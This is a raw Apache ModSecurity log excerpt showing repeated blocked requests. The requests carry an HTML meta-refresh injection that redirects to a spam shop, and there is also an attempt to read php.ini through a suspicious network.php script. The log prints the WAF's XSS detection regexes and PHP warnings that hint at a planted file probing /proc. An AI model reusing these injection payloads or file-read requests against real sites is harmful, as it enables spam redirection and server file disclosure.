"language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-GLvMumyrWMfSu7qu-QAAAM4"]
[Tue May 12 03:10:48.554630 2026] [security2:error] [pid 1709071:tid 1709101] [client 27.78.84.116:63862] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-GLvMumyrWMfSu7qu-QAAAM4"]
[Tue May 12 03:10:48.555476 2026] [security2:error] [pid 1709071:tid 1709101] [client 27.78.84.116:63862] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-GLvMumyrWMfSu7qu-QAAAM4"]
[Tue May 12 03:10:50.960379 2026] [security2:error] [pid 1691274:tid 1691291] [client 27.78.84.116:64072] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://tps:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-GlfdQaraX_prmqclHQAAAA8"]
[Tue May 12 03:10:50.960789 2026] [security2:error] [pid 1691274:tid 1691291] [client 27.78.84.116:64072] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu...."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-GlfdQaraX_prmqclHQAAAA8"]
[Tue May 12 03:10:50.960948 2026] [security2:error] [pid 1691274:tid 1691291] [client 27.78.84.116:64072] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "W [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-GlfdQaraX_prmqclHQAAAA8"]
[Tue May 12 03:10:50.961060 2026] [security2:error] [pid 1691274:tid 1691291] [client 27.78.84.116:64072] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-GlfdQaraX_prmqclHQAAAA8"]
[Tue May 12 03:10:50.961241 2026] [security2:error] [pid 1691274:tid 1691291] [client 27.78.84.116:64072] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-GlfdQaraX_prmqclHQAAAA8"]
[Tue May 12 03:10:50.961712 2026] [security2:error] [pid 1691274:tid 1691291] [client 27.78.84.116:64072] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-GlfdQaraX_prmqclHQAAAA8"]
[Tue May 12 03:10:50.961985 2026] [security2:error] [pid 1691274:tid 1691291] [client 27.78.84.116:64072] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-GlfdQaraX_prmqclHQAAAA8"]
[Tue May 12 03:11:01.503442 2026] [security2:error] [pid 1709071:tid 1709104] [client 43.164.190.28:54588] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agJ-JbvMumyrWMfSu7qu_AAAANE"]
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899832/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899832/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899832/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899832/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899832/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899832/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:11:23.220385 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:50089] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://tps:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-O1fdQaraX_prmqclLgAAABM"]
[Tue May 12 03:11:23.228994 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:50089] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu...."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-O1fdQaraX_prmqclLgAAABM"]
[Tue May 12 03:11:23.229621 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:50089] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "W [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-O1fdQaraX_prmqclLgAAABM"]
[Tue May 12 03:11:23.234178 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:50089] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-O1fdQaraX_prmqclLgAAABM"]
[Tue May 12 03:11:23.234623 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:50089] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-O1fdQaraX_prmqclLgAAABM"]
[Tue May 12 03:11:23.235344 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:50089] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-O1fdQaraX_prmqclLgAAABM"]
[Tue May 12 03:11:23.239773 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:50089] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-O1fdQaraX_prmqclLgAAABM"]
[Tue May 12 03:11:23.344435 2026] [security2:error] [pid 1730175:tid 1730200] [client 216.73.216.110:32374] ModSecurity: Warning. Matched phrase "etc/php.ini" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/php.ini found within ARGS:filesrc: /opt/cpanel/ea-php70/root/etc/php.ini.rpmsave"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJ-O3o6NvB9WXx5V-5-2gAAARc"]
[Tue May 12 03:11:23.349016 2026] [security2:error] [pid 1730175:tid 1730200] [client 216.73.216.110:32374] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJ-O3o6NvB9WXx5V-5-2gAAARc"]
[Tue May 12 03:11:23.433051 2026] [security2:error] [pid 1730175:tid 1730200] [client 216.73.216.110:32374] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ-O3o6NvB9WXx5V-5-2gAAARc"]
[Tue May 12 03:11:26.245486 2026] [security2:error] [pid 1709071:tid 1709097] [client 27.78.84.116:50353] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://tps:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-PrvMumyrWMfSu7qvCwAAAMo"]
[Tue May 12 03:11:26.247151 2026] [security2:error] [pid 1709071:tid 1709097] [client 27.78.84.116:50353] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu...."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-PrvMumyrWMfSu7qvCwAAAMo"]
[Tue May 12 03:11:26.249096 2026] [security2:error] [pid 1709071:tid 1709097] [client 27.78.84.116:50353] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "W [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-PrvMumyrWMfSu7qvCwAAAMo"]
[Tue May 12 03:11:26.253585 2026] [security2:error] [pid 1709071:tid 1709097] [client 27.78.84.116:50353] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-PrvMumyrWMfSu7qvCwAAAMo"]
